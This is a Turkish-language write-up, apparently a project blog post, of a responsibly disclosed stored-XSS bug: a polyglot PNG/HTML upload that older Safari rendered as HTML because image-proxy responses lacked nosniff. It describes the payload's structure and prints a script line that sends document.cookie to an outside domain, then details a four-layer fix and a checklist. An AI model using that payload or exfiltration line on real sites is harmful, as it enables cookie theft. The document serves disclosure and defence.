Polyglot PNG upload — eski Safari HTML olarak yorumladı, image-proxy nosniff eksiği (PR #616 EEE F4)

Sanliurfa Eyyubiye de 32 yaslarinda freelance security researcher + bug bounty hunter Burcin (@burcinsec), 6 yil Turksat Security Operations + 2 yil bagimsiz consultancy. Specialty MIME-sniffing + content-type confusion + polyglot file exploit, 3 SaaS bug bounty bu vector le. Pazar gecesi thMenu open-source repo image-proxy + asset-proxy okurken: Content-Type set ediliyor ama **X-Content-Type-Options: nosniff YOK**. "Polyglot dosya yuklersem eski Safari + legacy Edge sniff edip HTML yorumlar mi?" Test ortami iPhone 6s Safari 14 simulator. Polyglot dosya: 8-byte PNG signature + IHDR chunk + strategic padding + HTML body `<html><script>fetch("//burcinsec.com/x?c="+document.cookie)</script></html>`. Extension .png 250KB upload to thMenu R2 MENU_IMAGES. Image-proxy URL acti iPhone 6s Safari 14: **PNG image yerine HTML render edildi**, document.cookie test domain e exfiltrate. Modern Chrome/Safari 12+ safe (MIME-sniff yapmaz), eski Safari/Edge vulnerable. Burcin responsible disclosure security@thmenu.com PoC + iPhone 6s screenshot + threat model "modern safe legacy vulnerable, Turkiye ekosisteminde iPhone 6s + Galaxy A5 2018 hala yaygin." Engineering 1 saat reproduce + severity MEDIUM. grep -rn "Content-Type" cloudflare/src/handlers/ → 3 handler R2-public-serve: image-proxy.ts, asset-proxy.ts, reverse-proxy.ts. Hepsi Content-Type set ediyor ama nosniff yok. **PR #616 batch EEE F4** 4-katmanli fix: **Layer 1 nosniff her 3 handler** her response block (cached hit, R2 fetch, error): `headers: { "content-type": ct, "x-content-type-options": "nosniff" }`. **Layer 2 Content-Disposition + filename sanitize** `Content-Disposition: inline; filename="<sanitized>"` regex /[^a-zA-Z0-9_\-\.]/g + 64-char max prevents multipart breakout. **Layer 3 CSP image endpoint** `default-src "none"; img-src "self"; sandbox` sandbox iframe isolation belt-and-suspenders. **Layer 4 file-type upload validation** byte-level magic-number check upload time Content-Type header trust etmiyor non-PNG/JPEG/GIF/WebP reject polyglot pre-upload yakalanir. Engineering smoke test iPhone 6s Safari 14 nosniff response → broken image icon (HTML parse skipped, PNG decode fail invalid content). Production sweep R2 polyglot grep zero prior detect. Burcin **MEDIUM + €500 Wise + Hall of Fame + 1-year Pro tier**. Vaiva Vilnius Uzupis (@vaivasec, 5 yil Lithuanian gov SecOps + 2 yil bagimsiz) version ayni flow. Pattern: **R2/S3/GCS/Azure Blob gibi cloud storage tan served public content endpoint lerinde X-Content-Type-Options: nosniff zorunlu. Content-Type set yetmez legacy browser hala MIME-sniffing yapar. Polyglot upload + browser sniff = stored XSS.** Implementation checklist: (1) nosniff her response block; (2) Content-Disposition + filename sanitize regex 64-char max; (3) CSP sandbox image endpoint; (4) file-type upload-time magic number check byte-level; (5) quarterly grep Content-Type handlers + nosniff verify; (6) legacy browser smoke test iPhone 6s/Galaxy A5/older Mobile Edge; (7) pentest polyglot upload + legacy browser open MIME-sniff trigger.

İlgili makaleler